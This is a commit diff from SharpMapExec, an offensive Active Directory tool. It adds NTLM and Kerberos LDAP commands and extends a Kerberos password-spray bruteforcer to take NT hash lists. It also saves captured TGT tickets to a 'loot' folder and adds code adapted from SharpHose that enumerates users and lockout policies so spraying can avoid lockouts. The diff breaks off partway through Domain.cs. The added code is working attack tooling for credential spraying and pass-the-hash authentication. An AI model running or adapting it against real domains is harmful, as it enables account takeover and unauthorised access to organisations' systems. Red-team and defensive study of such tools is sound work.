STRLCPY/SharpMapExec

updated with ldap provider
cube0x0 committed 3 years ago

792e5306

1 parent ec5ecc8b

■ ■ ■ ■ ■ ■

SharpMapExec/Args/CommandCollection.cs

		skipped 20 lines
21	21		_availableCommands.Add(kerberosSmb.CommandName, () => new kerberosSmb());
22	22		_availableCommands.Add(kerberosWinrm.CommandName, () => new kerberosWinrm());
23	23		_availableCommands.Add(kerberosReg32.CommandName, () => new kerberosReg32());
	24	+	_availableCommands.Add(kerberosLdap.CommandName, () => new kerberosLdap());
24	25		_availableCommands.Add(NtlmWinrm.CommandName, () => new NtlmWinrm());
25	26		_availableCommands.Add(NtlmSmb.CommandName, () => new NtlmSmb());
26	27		_availableCommands.Add(NtlmCim.CommandName, () => new NtlmCim());
27	28		_availableCommands.Add(NtlmReg32.CommandName, () => new NtlmReg32());
	29	+	_availableCommands.Add(NtlmLdap.CommandName, () => new NtlmLdap());
28	30		}
29	31
30	32		public bool ExecuteCommand(string commandName, Dictionary<string, string> arguments)
		skipped 18 lines

■ ■ ■ ■ ■ ■

SharpMapExec/Args/Info.cs

		skipped 56 lines
57	57		Console.WriteLine(@" SharpMapExec.exe kerbspray /users:USERS.TXT /passwords:PASSWORDS.TXT /domain:DOMAIN /dc:DC");
58	58		Console.WriteLine(@" SharpMapExec.exe tgtdeleg");
59	59
	60	+	//ldap
	61	+	Console.WriteLine("\r\n --- Ldap ---");
	62	+	Console.WriteLine(@" SharpMapExec.exe ntlm ldap /user:USER /password:PASSWORD /domain:DOMAIN /dc:DC /m:MODULE");
	63	+	Console.WriteLine(@" SharpMapExec.exe kerberos ldap </user:USER /password:PASSWORD /domain:DOMAIN /dc:DC /m:MODULE \| /ticket:TICKET.Kirbi>");
	64	+	Console.WriteLine("\n Ldap modules");
	65	+	Console.WriteLine(@" /m:spraydata (Download user and password policy)");
	66	+
	67	+
60	68		Console.WriteLine("\r\n");
61	69		}
62	70		}
		skipped 1 lines

■ ■ ■ ■ ■ ■

SharpMapExec/Commands/KerberosSpray.cs

1	1		using Rubeus;
	2	+	using SharpMapExec.Lib;
2	3		using System;
3	4		using System.Collections;
4	5		using System.Collections.Generic;
		skipped 11 lines
16	17
17	18		private string domain = "";
18	19		private string[] usernames = null;
19		-	private string[] passwords = null;
	20	+	private string[] passwords = new string[] { };
	21	+	private string[] hashes = new string[] { };
20	22		private string dc = "";
21	23		private string ou = "";
22	24		private string credUser = "";
		skipped 13 lines
36	38
37	39		public void Execute(Dictionary<string, string> arguments)
38	40		{
	41	+
39	42		Console.WriteLine("\r\n[*] Action: Perform Kerberos Brute Force\r\n");
40	43		try
41	44		{
42	45		this.ParseArguments(arguments);
	46	+	if (this.passwords.Length == 0 && this.hashes.Length == 0)
	47	+	{
	48	+	throw new BruteArgumentException("[X] You must supply a secret! Use /password:<password> or /passwords:<file> or /hash:<hash> or /hashes:<file>");
	49	+	}
43	50		this.ObtainUsers();
44	51
45		-	IBruteforcerReporter consoleReporter = new BruteforceConsoleReporter(
46		-	this.outfile, this.verbose, this.saveTickets);
	52	+	IBruteforcerReporter consoleReporter = new BruteforceConsoleReporter(this.outfile, this.verbose, this.saveTickets);
	53	+
	54	+	Console.WriteLine("Continue?");
	55	+	string a = Console.ReadLine();
47	56
48	57		Bruteforcer bruter = new Bruteforcer(this.domain, this.dc, consoleReporter);
49		-	bool success = bruter.Attack(this.usernames, this.passwords);
	58	+	bool success = bruter.Attack(this.usernames, this.passwords, this.hashes);
50	59		if (success)
51	60		{
52	61		if (!String.IsNullOrEmpty(this.outfile))
		skipped 27 lines
80	89		this.ParseDC(arguments);
81	90		this.ParseCreds(arguments);
82	91		this.ParsePasswords(arguments);
	92	+	this.ParseHashes(arguments);
83	93		this.ParseUsers(arguments);
84	94		this.ParseOutfile(arguments);
85	95		this.ParseVerbose(arguments);
		skipped 72 lines
158	168		{
159	169		this.passwords = new string[] { arguments["/password"] };
160	170		}
161		-	else
	171	+	//else
	172	+	//{
	173	+	// throw new BruteArgumentException(
	174	+	// "[X] You must supply a password! Use /password:<password> or /passwords:<file>");
	175	+	//}
	176	+	}
	177	+
	178	+	private void ParseHashes(Dictionary<string, string> arguments)
	179	+	{
	180	+	if (arguments.ContainsKey("/hashes"))
162	181		{
163		-	throw new BruteArgumentException(
164		-	"[X] You must supply a password! Use /password:<password> or /passwords:<file>");
	182	+	try
	183	+	{
	184	+	this.hashes = File.ReadAllLines(arguments["/hashes"]);
	185	+	}
	186	+	catch (FileNotFoundException)
	187	+	{
	188	+	throw new BruteArgumentException("[X] Unable to open hashes file \"" + arguments["/hashes"] + "\": Not found file");
	189	+	}
165	190		}
	191	+	else if (arguments.ContainsKey("/hash"))
	192	+	{
	193	+	this.hashes = new string[] { arguments["/hash"] };
	194	+	}
	195	+	//else
	196	+	//{
	197	+	// throw new BruteArgumentException(
	198	+	// "[X] You must supply a password! Use /hash:<hash> or /hashes:<file>");
	199	+	//}
166	200		}
167	201
168	202		private void ParseUsers(Dictionary<string, string> arguments)
		skipped 54 lines
223	257		}
224	258		}
225	259
	260	+
226	261		private string[] DomainUsernames()
227	262		{
228	263
		skipped 16 lines
245	280		Console.WriteLine("[*] Using alternate creds : {0}\r\n", userDomain);
246	281		}
247	282
248		-
	283	+	//user list
	284	+	List<UserInfo> Users = new List<UserInfo>();
249	285		DirectorySearcher userSearcher = new DirectorySearcher(directoryObject);
250		-	userSearcher.Filter = "(samAccountType=805306368)";
251		-	userSearcher.PropertiesToLoad.Add("samAccountName");
	286	+	userSearcher.Filter = "(&(objectCategory=person)(objectClass=user)(!userAccountControl:1.2.840.113556.1.4.803:=2))";
	287	+	userSearcher.PropertiesToLoad.Add("sAMAccountName");
	288	+	userSearcher.PropertiesToLoad.Add("badPwdCount");
	289	+	userSearcher.PropertiesToLoad.Add("badPasswordTime");
	290	+	userSearcher.PropertiesToLoad.Add("lockoutTime");
	291	+	userSearcher.PropertiesToLoad.Add("lockoutDuration");
	292	+	userSearcher.PropertiesToLoad.Add("pwdLastSet");
	293	+	userSearcher.SearchScope = SearchScope.Subtree;
	294	+
	295	+	//pass policy
	296	+	List<LDAPPasswordPolicy> Policies = new List<LDAPPasswordPolicy>();
	297	+	Policies.Add(Domain.GetDomainPolicy(directoryObject));
	298	+
	299	+	var fineGrainedPolicies = Domain.GetFineGrainedPolicies(directoryObject);
	300	+	fineGrainedPolicies.ForEach(x => x.AppliesToUsers = Domain.GetPasswordPolicyUsers(x, directoryObject));
	301	+	Policies.AddRange(fineGrainedPolicies);
252	302
253	303		try
254	304		{
		skipped 5 lines
260	310		{
261	311		string username = user.Properties["samAccountName"][0].ToString();
262	312		usernames.Add(username);
	313	+
	314	+	LDAPPasswordPolicy policy;
	315	+	var user2 = new LDAPUserInfo(user);
	316	+	policy = user2.GetUserPolicy(Policies);
	317	+	user2 = user2.ClassifyUser(policy);
	318	+	Users.Add(user2);
263	319		}
264	320
265		-	return usernames.Cast<object>().Select(x => x.ToString()).ToArray();
	321	+	Console.WriteLine($"Password Policy Count: ({Policies.Count}):");
	322	+	foreach (var policy in Policies.OrderBy(x => x.PasswordPrecendence))
	323	+	{
	324	+	Domain.DisplayPolicyDetails(Policies[0], Policies, Users);
	325	+	Console.WriteLine($"-----------------------------------");
	326	+	}
	327	+
	328	+	return Domain.GetList(Policies, Users);
	329	+	//return usernames.Cast<object>().Select(x => x.ToString()).ToArray();
266	330		}
267	331		catch (System.Runtime.InteropServices.COMException ex)
268	332		{
		skipped 147 lines
416	480		{
417	481		if (this.saveTicket)
418	482		{
419		-	string ticketFilename = username + ".kirbi";
	483	+	string ticketFilename = Path.Combine("loot", username + ".kirbi");
420	484		File.WriteAllBytes(ticketFilename, ticket);
421	485		Console.WriteLine("[*] Saved TGT into {0}", ticketFilename);
422	486		}
		skipped 20 lines

■ ■ ■ ■ ■ ■

SharpMapExec/Commands/NtlmCim.cs

		skipped 17 lines
18	18		string path = "";
19	19		string destination = "";
20	20		string[] computernames;
21		-	var hash = new NTHash();
22		-	var password = new ClearText();
	21	+	string[] hashes = null;
	22	+	string[] passwords = null;
23	23		string module = "";
24	24		string moduleargument = "";
25	25		List<string> flags = new List<string>();
		skipped 69 lines
95	95		{
96	96		if (File.Exists(arguments["/password"]))
97	97		{
98		-	password.Cleartext = File.ReadAllLines(arguments["/password"]);
	98	+	passwords = File.ReadAllLines(arguments["/password"]);
99	99		}
100	100		else
101	101		{
102		-	password.Cleartext = arguments["/password"].Split(',');
	102	+	passwords = arguments["/password"].Split(',');
103	103		}
104	104		}
105	105		else if (arguments.ContainsKey("/ntlm"))
106	106		{
107	107		if (File.Exists(arguments["/ntlm"]))
108	108		{
109		-	hash.Nthash = File.ReadAllLines(arguments["/ntlm"]);
	109	+	hashes = File.ReadAllLines(arguments["/ntlm"]);
110	110		}
111	111		else
112	112		{
113		-	hash.Nthash = arguments["/ntlm"].Split(',');
	113	+	hashes = arguments["/ntlm"].Split(',');
114	114		}
115	115		}
116	116		else
		skipped 31 lines
148	148		Scan.CIM(cimSession, module);
149	149		}
150	150		}
151		-	else if (password.Cleartext != null)
	151	+	else if (passwords != null)
152	152		{
153		-	Lib.ntlm.Ntlm(user, domain, password, computernames, module, moduleargument, path, destination, flags, "cim");
	153	+	Lib.ntlm.Ntlm(user, domain, passwords, hashes, computernames, "", module, moduleargument, path, destination, flags, "cim");
154	154		}
155	155		else
156	156		{
		skipped 6 lines

■ ■ ■ ■ ■ ■

SharpMapExec/Commands/NtlmLdap.cs

1	+	using System;
2	+	using System.Collections.Generic;
3	+	using System.IO;
4	+	using static SharpMapExec.Helpers.SecurityContext;
5	+
6	+	namespace SharpMapExec.Commands
7	+	{
8	+	public class NtlmLdap : ICommand
9	+	{
10	+	public static string CommandName => "ntlmldap";
11	+
12	+	public void Execute(Dictionary<string, string> arguments)
13	+	{
14	+	string[] user;
15	+	string domain = "";
16	+	string path = "";
17	+	string destination = "";
18	+	string domainController = "";
19	+	string[] computernames = null;
20	+	string[] hashes = null;
21	+	string[] passwords = null;
22	+	string module = "";
23	+	string moduleargument = "";
24	+	List<string> flags = new List<string>();
25	+
26	+	if (arguments.ContainsKey("/d"))
27	+	{
28	+	destination = arguments["/d"];
29	+	}
30	+	if (arguments.ContainsKey("/destination"))
31	+	{
32	+	destination = arguments["/destination"];
33	+	}
34	+	if (arguments.ContainsKey("/p"))
35	+	{
36	+	path = arguments["/p"];
37	+	}
38	+	if (arguments.ContainsKey("/path"))
39	+	{
40	+	path = arguments["/path"];
41	+	}
42	+	if (arguments.ContainsKey("/m"))
43	+	{
44	+	module = arguments["/m"];
45	+	}
46	+	else if (arguments.ContainsKey("/module"))
47	+	{
48	+	module = arguments["/module"];
49	+	}
50	+	else
51	+	{
52	+	Console.WriteLine("[-] /m or /module must be supplied");
53	+	return;
54	+	}
55	+	if (arguments.ContainsKey("/a"))
56	+	{
57	+	moduleargument = arguments["/a"];
58	+	}
59	+	if (arguments.ContainsKey("/argument"))
60	+	{
61	+	moduleargument = arguments["/argument"];
62	+	}
63	+
64	+
65	+	//
66	+	if (arguments.ContainsKey("/domain"))
67	+	{
68	+	domain = arguments["/domain"];
69	+	}
70	+	else
71	+	{
72	+	Console.WriteLine("[-] /domain must be supplied");
73	+	return;
74	+	}
75	+
76	+	if (arguments.ContainsKey("/dc"))
77	+	{
78	+	domainController = arguments["/dc"];
79	+	}
80	+	else if (arguments.ContainsKey("/domaincontroller"))
81	+	{
82	+	domainController = arguments["/domaincontroller"];
83	+	}
84	+
85	+	if (arguments.ContainsKey("/user"))
86	+	{
87	+	if (File.Exists(arguments["/user"]))
88	+	{
89	+	user = File.ReadAllLines(arguments["/user"]);
90	+	}
91	+	else
92	+	{
93	+	string[] parts = arguments["/user"].Split('\\');
94	+	if (parts.Length == 2)
95	+	{
96	+	domain = parts[0];
97	+	user = parts[1].Split(',');
98	+	}
99	+	else
100	+	{
101	+	user = arguments["/user"].Split(',');
102	+	}
103	+	}
104	+	}
105	+	else
106	+	{
107	+	Console.WriteLine("[-] /user must be supplied!");
108	+	return;
109	+	}
110	+
111	+
112	+	if (arguments.ContainsKey("/password"))
113	+	{
114	+	if (File.Exists(arguments["/password"]))
115	+	{
116	+	passwords = File.ReadAllLines(arguments["/password"]);
117	+	}
118	+	else
119	+	{
120	+	passwords = arguments["/password"].Split(',');
121	+	}
122	+	}
123	+	else if (arguments.ContainsKey("/ntlm"))
124	+	{
125	+	if (File.Exists(arguments["/ntlm"]))
126	+	{
127	+	hashes = File.ReadAllLines(arguments["/ntlm"]);
128	+	}
129	+	else
130	+	{
131	+	hashes = arguments["/ntlm"].Split(',');
132	+	}
133	+	}
134	+	else
135	+	{
136	+	Console.WriteLine("[-] /password or /ntlm must be supplied");
137	+	return;
138	+	}
139	+
140	+
141	+	Lib.ntlm.Ntlm(user, domain, passwords, hashes, computernames, domainController, module, moduleargument, path, destination, flags, "domain");
142	+	}
143	+	}
144	+	}

■ ■ ■ ■ ■ ■

SharpMapExec/Commands/NtlmReg32.cs

		skipped 15 lines
16	16		string path = "";
17	17		string destination = "";
18	18		string[] computernames;
19		-	var hash = new NTHash();
20		-	var password = new ClearText();
	19	+	string[] hashes = null;
	20	+	string[] passwords = null;
21	21		string module = "";
22	22		string moduleargument = "";
23	23		List<string> flags = new List<string>();
		skipped 64 lines
88	88		{
89	89		if (File.Exists(arguments["/password"]))
90	90		{
91		-	password.Cleartext = File.ReadAllLines(arguments["/password"]);
	91	+	passwords = File.ReadAllLines(arguments["/password"]);
92	92		}
93	93		else
94	94		{
95		-	password.Cleartext = arguments["/password"].Split(',');
	95	+	passwords = arguments["/password"].Split(',');
96	96		}
97	97		}
98	98		else if (arguments.ContainsKey("/ntlm"))
99	99		{
100	100		if (File.Exists(arguments["/ntlm"]))
101	101		{
102		-	hash.Nthash = File.ReadAllLines(arguments["/ntlm"]);
	102	+	hashes = File.ReadAllLines(arguments["/ntlm"]);
103	103		}
104	104		else
105	105		{
106		-	hash.Nthash = arguments["/ntlm"].Split(',');
	106	+	hashes = arguments["/ntlm"].Split(',');
107	107		}
108	108		}
109	109		else
		skipped 22 lines
132	132		return;
133	133		}
134	134
135		-	if (password.Cleartext != null)
136		-	{
137		-	Lib.ntlm.Ntlm(user, domain, password, computernames, module, moduleargument, path, destination, flags, "reg32");
138		-	}
139		-	else
140		-	{
141		-	Lib.ntlm.Ntlm(user, domain, hash, computernames, module, moduleargument, path, destination, flags, "reg32");
142		-	}
	135	+	Lib.ntlm.Ntlm(user, domain, passwords, hashes, computernames, "", module, moduleargument, path, destination, flags, "reg32");
143	136		}
144	137		}
145	138		}

■ ■ ■ ■ ■ ■

SharpMapExec/Commands/NtlmSmb.cs

		skipped 12 lines
13	13		{
14	14		string[] user;
15	15		string domain = "";
	16	+	string path = "";
	17	+	string destination = "";
16	18		string[] computernames;
17		-	var hash = new NTHash();
18		-	var password = new ClearText();
	19	+	string[] hashes = null;
	20	+	string[] passwords = null;
19	21		string module = "";
20	22		string moduleargument = "";
21	23		List<string> flags = new List<string>();
		skipped 73 lines
95	97		{
96	98		if (File.Exists(arguments["/password"]))
97	99		{
98		-	password.Cleartext = File.ReadAllLines(arguments["/password"]);
	100	+	passwords = File.ReadAllLines(arguments["/password"]);
99	101		}
100	102		else
101	103		{
102		-	password.Cleartext = arguments["/password"].Split(',');
	104	+	passwords = arguments["/password"].Split(',');
103	105		}
104	106		}
105	107		else if (arguments.ContainsKey("/ntlm"))
106	108		{
107	109		if (File.Exists(arguments["/ntlm"]))
108	110		{
109		-	hash.Nthash = File.ReadAllLines(arguments["/ntlm"]);
	111	+	hashes = File.ReadAllLines(arguments["/ntlm"]);
110	112		}
111	113		else
112	114		{
113		-	hash.Nthash = arguments["/ntlm"].Split(',');
	115	+	hashes = arguments["/ntlm"].Split(',');
114	116		}
115	117		}
116	118		else
		skipped 1 lines
118	120		Console.WriteLine("[-] /password or /ntlm must be supplied");
119	121		return;
120	122		}
121		-	if (password.Cleartext != null)
122		-	{
123		-	Lib.ntlm.Ntlm(user, domain, password, computernames, module, moduleargument, "", "", flags, "smb");
124		-	}
125		-	else
126		-	{
127		-	Lib.ntlm.Ntlm(user, domain, hash, computernames, module, moduleargument, "", "", flags, "smb");
128		-	}
	123	+	Lib.ntlm.Ntlm(user, domain, passwords, hashes, computernames, "", module, moduleargument, path, destination, flags, "smb");
129	124		}
130	125		}
131	126		}

■ ■ ■ ■ ■ ■

SharpMapExec/Commands/NtlmWinrm.cs

		skipped 15 lines
16	16		string path = "";
17	17		string destination = "";
18	18		string[] computernames;
19		-	var hash = new NTHash();
20		-	var password = new ClearText();
	19	+	string[] hashes = null;
	20	+	string[] passwords = null;
21	21		string module = "";
22	22		string moduleargument = "";
23	23		List<string> flags = new List<string>();
		skipped 117 lines
141	141		{
142	142		if (File.Exists(arguments["/password"]))
143	143		{
144		-	password.Cleartext = File.ReadAllLines(arguments["/password"]);
	144	+	passwords = File.ReadAllLines(arguments["/password"]);
145	145		}
146	146		else
147	147		{
148		-	password.Cleartext = arguments["/password"].Split(',');
	148	+	passwords = arguments["/password"].Split(',');
149	149		}
150	150		}
151	151		else if (arguments.ContainsKey("/ntlm"))
152	152		{
153	153		if (File.Exists(arguments["/ntlm"]))
154	154		{
155		-	hash.Nthash = File.ReadAllLines(arguments["/ntlm"]);
	155	+	hashes = File.ReadAllLines(arguments["/ntlm"]);
156	156		}
157	157		else
158	158		{
159		-	hash.Nthash = arguments["/ntlm"].Split(',');
	159	+	hashes = arguments["/ntlm"].Split(',');
160	160		}
161	161		}
162	162		else
		skipped 3 lines
166	166		}
167	167
168	168
169		-	if (password.Cleartext != null)
170		-	{
171		-	Lib.ntlm.Ntlm(user, domain, password, computernames, module, moduleargument, path, destination, flags, "winrm");
172		-	}
173		-	else
174		-	{
175		-	Lib.ntlm.Ntlm(user, domain, hash, computernames, module, moduleargument, path, destination, flags, "winrm");
176		-	}
	169	+	Lib.ntlm.Ntlm(user, domain, passwords, hashes, computernames, "", module, moduleargument, path, destination, flags, "winrm");
177	170		}
178	171		}
179	172		}

■ ■ ■ ■ ■ ■

SharpMapExec/Commands/kerberosLdap.cs

1	+	using Rubeus;
2	+	using System;
3	+	using System.Collections.Generic;
4	+	using System.IO;
5	+
6	+	namespace SharpMapExec.Commands
7	+	{
8	+	public class kerberosLdap : ICommand
9	+	{
10	+	public static string CommandName => "kerberosldap";
11	+
12	+	public void Execute(Dictionary<string, string> arguments)
13	+	{
14	+	string[] users = { };
15	+	string domain = "";
16	+	string path = "";
17	+	string destination = "";
18	+	string[] passwords = { };
19	+	string[] hashes = { };
20	+	string dc = "";
21	+	string ticket = "";
22	+	Interop.KERB_ETYPE encType = Interop.KERB_ETYPE.subkey_keymaterial;
23	+	string[] computernames = null;
24	+	string module = "";
25	+	string moduleargument = "";
26	+	List<string> flags = new List<string>();
27	+
28	+	if (arguments.ContainsKey("/d"))
29	+	{
30	+	destination = arguments["/d"];
31	+	}
32	+	if (arguments.ContainsKey("/destination"))
33	+	{
34	+	destination = arguments["/destination"];
35	+	}
36	+	if (arguments.ContainsKey("/p"))
37	+	{
38	+	path = arguments["/p"];
39	+	}
40	+	if (arguments.ContainsKey("/path"))
41	+	{
42	+	path = arguments["/path"];
43	+	}
44	+	if (arguments.ContainsKey("/m"))
45	+	{
46	+	module = arguments["/m"];
47	+	}
48	+	else if (arguments.ContainsKey("/module"))
49	+	{
50	+	module = arguments["/module"];
51	+	}
52	+	else
53	+	{
54	+	Console.WriteLine("[-] /m or /module must be supplied");
55	+	return;
56	+	}
57	+	if (arguments.ContainsKey("/a"))
58	+	{
59	+	moduleargument = arguments["/a"];
60	+	}
61	+	if (arguments.ContainsKey("/argument"))
62	+	{
63	+	moduleargument = arguments["/argument"];
64	+	}
65	+
66	+
67	+	//
68	+	if (arguments.ContainsKey("/user"))
69	+	{
70	+	if (File.Exists(arguments["/user"]))
71	+	{
72	+	users = File.ReadAllLines(arguments["/user"]);
73	+	}
74	+	else
75	+	{
76	+	string[] parts = arguments["/user"].Split('\\');
77	+	if (parts.Length == 2)
78	+	{
79	+	domain = parts[0];
80	+	users = parts[1].Split(',');
81	+	}
82	+	else
83	+	{
84	+	users = arguments["/user"].Split(',');
85	+	}
86	+	}
87	+	}
88	+
89	+	if (arguments.ContainsKey("/domain"))
90	+	{
91	+	domain = arguments["/domain"];
92	+	}
93	+	else
94	+	{
95	+	Console.WriteLine("[-] /domain must be supplied");
96	+	return;
97	+	}
98	+	if (arguments.ContainsKey("/dc"))
99	+	{
100	+	dc = arguments["/dc"];
101	+	}
102	+	if (arguments.ContainsKey("/ticket"))
103	+	{
104	+	ticket = arguments["/ticket"];
105	+	}
106	+
107	+	if (arguments.ContainsKey("/encType"))
108	+	{
109	+	string encTypeString = encType.ToString().ToUpper();
110	+
111	+	if (encTypeString.Equals("RC4") \|\| encTypeString.Equals("NTLM"))
112	+	{
113	+	encType = Interop.KERB_ETYPE.rc4_hmac;
114	+	}
115	+	else if (encTypeString.Equals("AES128"))
116	+	{
117	+	encType = Interop.KERB_ETYPE.aes128_cts_hmac_sha1;
118	+	}
119	+	else if (encTypeString.Equals("AES256") \|\| encTypeString.Equals("AES"))
120	+	{
121	+	encType = Interop.KERB_ETYPE.aes256_cts_hmac_sha1;
122	+	}
123	+	else if (encTypeString.Equals("DES"))
124	+	{
125	+	encType = Interop.KERB_ETYPE.des_cbc_md5;
126	+	}
127	+	}
128	+	else
129	+	encType = Interop.KERB_ETYPE.rc4_hmac;
130	+
131	+	if (arguments.ContainsKey("/password"))
132	+	{
133	+	if (File.Exists(arguments["/password"]))
134	+	passwords = File.ReadAllLines(arguments["/password"]);
135	+	else
136	+	passwords = arguments["/password"].Split(',');
137	+	}
138	+	else if (arguments.ContainsKey("/des"))
139	+	{
140	+	if (File.Exists(arguments["/des"]))
141	+	hashes = File.ReadAllLines(arguments["/des"]);
142	+	else
143	+	hashes = arguments["/des"].Split(',');
144	+	encType = Interop.KERB_ETYPE.des_cbc_md5;
145	+	}
146	+	else if (arguments.ContainsKey("/rc4"))
147	+	{
148	+	if (File.Exists(arguments["/rc4"]))
149	+	hashes = File.ReadAllLines(arguments["/rc4"]);
150	+	else
151	+	hashes = arguments["/rc4"].Split(',');
152	+	encType = Interop.KERB_ETYPE.rc4_hmac;
153	+	}
154	+	else if (arguments.ContainsKey("/ntlm"))
155	+	{
156	+	if (File.Exists(arguments["/ntlm"]))
157	+	hashes = File.ReadAllLines(arguments["/ntlm"]);
158	+	else
159	+	hashes = arguments["/ntlm"].Split(',');
160	+	encType = Interop.KERB_ETYPE.rc4_hmac;
161	+	}
162	+	else if (arguments.ContainsKey("/aes128"))
163	+	{
164	+	hashes = arguments["/aes128"].Split(',');
165	+	encType = Interop.KERB_ETYPE.aes128_cts_hmac_sha1;
166	+	}
167	+	else if (arguments.ContainsKey("/aes256"))
168	+	{
169	+	hashes = arguments["/aes256"].Split(',');
170	+	encType = Interop.KERB_ETYPE.aes256_cts_hmac_sha1;
171	+	}
172	+
173	+	if (users.Length == 0 && String.IsNullOrEmpty(ticket))
174	+	{
175	+	Console.WriteLine("\r\n[X] You must supply a user name!\r\n");
176	+	return;
177	+	}
178	+	if (String.IsNullOrEmpty(domain) && String.IsNullOrEmpty(ticket))
179	+	{
180	+	Console.WriteLine("\r\n[X] You must supply a domain!\r\n");
181	+	return;
182	+	}
183	+
184	+	if ((hashes.Length == 0 && passwords.Length == 0) && String.IsNullOrEmpty(ticket))
185	+	{
186	+	Console.WriteLine("\r\n[X] You must supply a /password , or a [/des\|/rc4\|/aes128\|/aes256] hash!\r\n");
187	+	return;
188	+	}
189	+
190	+	if (String.IsNullOrEmpty(ticket) && (!((encType == Interop.KERB_ETYPE.des_cbc_md5) \|\| (encType == Interop.KERB_ETYPE.rc4_hmac) \|\| (encType == Interop.KERB_ETYPE.aes128_cts_hmac_sha1) \|\| (encType == Interop.KERB_ETYPE.aes256_cts_hmac_sha1))))
191	+	{
192	+	Console.WriteLine("\r\n[X] Only /des, /rc4, /aes128, and /aes256 are supported at this time.\r\n");
193	+	return;
194	+	}
195	+
196	+	Lib.kerberos.Kerberos(users, domain, passwords, hashes, ticket, encType, dc, computernames, module, moduleargument, path, destination, flags, "ldap");
197	+	}
198	+	}
199	+	}

■ ■ ■ ■ ■ ■

SharpMapExec/Lib/Domain.cs

1	+	using System;
2	+	using System.Collections;
3	+	using System.Collections.Generic;
4	+	using System.DirectoryServices;
5	+	using System.IO;
6	+	using System.Linq;
7	+	using System.Net;
8	+	using System.Net.NetworkInformation;
9	+	using System.Text;
10	+	using System.Web.Script.Serialization;
11	+
12	+	namespace SharpMapExec.Lib
13	+	{
14	+	// https://github.com/ustayready/SharpHose
15	+	public class LDAPPasswordPolicy
16	+	{
17	+	public int LockoutThreshold { get; set; }
18	+	public long LockoutDuration { get; set; }
19	+	public long LockoutObservationWindow { get; set; }
20	+	public int MinimumPasswordLength { get; set; }
21	+	public long MinimumPasswordAge { get; set; }
22	+	public long MaximumPasswordAge { get; set; }
23	+	public bool PossiblyCustomized { get; set; }
24	+	public string Name { get; set; }
25	+	public bool IsFineGrained { get; set; }
26	+	public int PasswordHistoryLength { get; set; }
27	+	public List<string> AppliesToDN { get; set; }
28	+	public int PasswordPrecendence { get; set; }
29	+	public bool ComplexityEnabled { get; set; }
30	+	public bool ReversibleEncryptionEnabled { get; set; }
31	+	public string ADSPath { get; set; }
32	+	public List<string> AppliesToUsers { get; set; }
33	+
34	+	public LDAPPasswordPolicy(SearchResult result, bool isFineGrained)
35	+	{
36	+	AppliesToDN = new List<string>();
37	+	AppliesToUsers = new List<string>();
38	+	IsFineGrained = isFineGrained;
39	+
40	+	if (isFineGrained)
41	+	{
42	+	LoadFineGrainedPolicy(result);
43	+	}
44	+	else
45	+	{
46	+	LoadDomainPolicy(result);
47	+	}
48	+	}
49	+
50	+	private void LoadFineGrainedPolicy(SearchResult result)
51	+	{
52	+	foreach (DictionaryEntry prop in result.Properties)
53	+	{
54	+	var property = (string)prop.Key;
55	+	var value = (ResultPropertyValueCollection)prop.Value;
56	+
57	+	if (property == "msds-psoappliesto")
58	+	{
59	+	foreach (string applies in (ResultPropertyValueCollection)value)
60	+	{
61	+	AppliesToDN.Add(applies);
62	+	}
63	+	}
64	+	else if (new string[] { "name", "adspath" }.Any(x => x == property))
65	+	{
66	+	switch (property)
67	+	{
68	+	case "name":
69	+	Name = (string)value[0];
70	+	break;
71	+
72	+	case "adspath":
73	+	ADSPath = (string)value[0];
74	+	break;
75	+	}
76	+	}
77	+	else if (new string[] { "msds-passwordcomplexityenabled", "msds-passwordreversibleencryptionenabled" }.Any(x => x == property))
78	+	{
79	+	bool placeHolder = (bool)value[0];
80	+	switch (property)
81	+	{
82	+	case "msds-passwordcomplexityenabled":
83	+	ComplexityEnabled = placeHolder;
84	+	break;
85	+
86	+	case "msds-passwordreversibleencryptionenabled":
87	+	ReversibleEncryptionEnabled = placeHolder;
88	+	break;
89	+	}
90	+	}
91	+	else if (new string[] { "msds-lockoutobservationwindow", "msds-lockoutduration", "msds-minimumpasswordage", "msds-maximumpasswordage" }.Any(x => x == property))
92	+	{
93	+	long placeHolder = (long)value[0];
94	+	switch (property)
95	+	{
96	+	case "msds-lockoutobservationwindow":
97	+	LockoutObservationWindow = placeHolder;
98	+	break;
99	+
100	+	case "msds-lockoutduration":
101	+	LockoutDuration = placeHolder;
102	+	break;
103	+
104	+	case "msds-minimumpasswordage":
105	+	MinimumPasswordAge = placeHolder;
106	+	break;
107	+
108	+	case "msds-maximumpasswordage":
109	+	MaximumPasswordAge = placeHolder;
110	+	break;
111	+	}
112	+	}
113	+	else
114	+	{
115	+	int placeHolder;
116	+	int.TryParse(value[0].ToString(), out placeHolder);
117	+
118	+	switch (property)
119	+	{
120	+	case "msds-lockoutthreshold":
121	+	LockoutThreshold = placeHolder;
122	+	break;
123	+
124	+	case "msds-minimumpasswordlength":
125	+	MinimumPasswordLength = placeHolder;
126	+	break;
127	+
128	+	case "msds-passwordhistorylength":
129	+	PasswordHistoryLength = placeHolder;
130	+	break;
131	+
132	+	case "msds-passwordsettingsprecedence":
133	+	PasswordPrecendence = placeHolder;
134	+	break;
135	+	}
136	+	}
137	+	}
138	+	}
139	+
140	+	public void LoadDomainPolicy(SearchResult result)
141	+	{
142	+	PasswordPrecendence = 0;
143	+
144	+	foreach (DictionaryEntry prop in result.Properties)
145	+	{
146	+	var property = (string)prop.Key;
147	+	var value = (ResultPropertyValueCollection)prop.Value;
148	+
149	+	if (new string[] { "name", "adspath" }.Any(x => x == property))
150	+	{
151	+	switch (property)
152	+	{
153	+	case "name":
154	+	Name = (string)value[0];
155	+	break;
156	+
157	+	case "adspath":
158	+	ADSPath = (string)value[0];
159	+	break;
160	+	}
161	+	}
162	+	else if (new string[] { "lockoutobservationwindow", "lockoutduration", "minpwdage", "maxpwdage" }.Any(x => x == property))
163	+	{
164	+	long placeHolder = (long)value[0];
165	+	switch (property)
166	+	{
167	+	case "lockoutobservationwindow":
168	+	LockoutObservationWindow = placeHolder;
169	+	break;
170	+
171	+	case "lockoutduration":
172	+	LockoutDuration = placeHolder;
173	+	break;
174	+
175	+	case "minpwdage":
176	+	MinimumPasswordAge = placeHolder;
177	+	break;
178	+
179	+	case "maxpwdage":
180	+	MaximumPasswordAge = placeHolder;
181	+	break;
182	+	}
183	+	}
184	+	else
185	+	{
186	+	int placeHolder;
187	+	int.TryParse(value[0].ToString(), out placeHolder);
188	+
189	+	switch (property)
190	+	{
191	+	case "lockoutthreshold":
192	+	LockoutThreshold = placeHolder;
193	+	break;
194	+
195	+	case "minpwdlength":
196	+	MinimumPasswordLength = placeHolder;
197	+	break;
198	+
199	+	case "pwdhistorylength":
